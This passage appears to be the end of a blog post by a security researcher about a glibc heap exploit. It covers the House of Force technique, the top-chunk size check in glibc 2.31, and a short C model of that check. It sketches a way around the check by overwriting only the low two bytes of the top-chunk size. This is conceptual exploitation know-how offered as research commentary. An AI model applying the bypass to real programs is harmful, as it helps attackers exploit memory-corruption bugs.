The House of Force will be out of business soon. For example, Ubuntu 20.04 LTS ships with glibc 2.31, which includes a run-time check to block it. Does it mean that exploits like this will no longer be possible? I don’t think so. In hindsight, I could have designed the exploit to only overwrite the size of the top chunk with the bottom two bytes of the stack address, rather than the entire address, which would be a small enough number to avoid triggering the new run-time check. It would add a few more steps to the exploit because I would need to reconstruct the new address by concatenating bytes, but I think it would work.
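As I understand it, the new run-time check compares the size of the top chunk against the total amount of memory that the arena has obtained from the system. This is a minimal model of that comparison, with a hypothetical function name and example values. It is not the glibc source.

```c
#include <assert.h>
#include <stdint.h>

/* Model of the newer sanity check: the top chunk cannot be larger than
 * the memory that the arena has obtained from the system. */
static int top_size_plausible(uint64_t top_size_field, uint64_t system_mem)
{
    assert(system_mem > 0);
    return (top_size_field & ~(uint64_t) 0x7) <= system_mem;
}
```

With a typical initial heap of 0x21000 bytes, a size forged from a full stack pointer fails the check, whereas a 16-bit value (at most 0xffff) would pass, which is why overwriting only the bottom two bytes looks like a viable way around it.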
I personally think it’s a little bit sad to see the glibc allocator — one of the most fundamental building blocks of all our software — getting gunked up with ever more run-time checks. Even if the run-time cost is very small, it’s still a price that we all pay. And it’s often futile. If an application has a bad heap corruption vulnerability, then run-time checks in the allocator are often just speed bumps on the road to exploitation. Ultimately, the only way to solve these issues is by eliminating the memory corruption vulnerabilities. Mitigations in the allocator won’t save us.
1. It’s slightly ambiguous where heap chunks begin and end, because the blocks of metadata include information about the chunks above and below. In my diagram, I have started each chunk from the beginning of the metadata, which is consistent with the alignment of the malloc_chunk datatype. However, it glosses over the fact that the bottom half of the metadata block really belongs with the chunk below rather than the chunk above, particularly because it is used to store user data while the chunk is allocated. Azeria, in her overview of the glibc heap implementation, has instead depicted the chunks as starting and ending in the middle of the metadata blocks.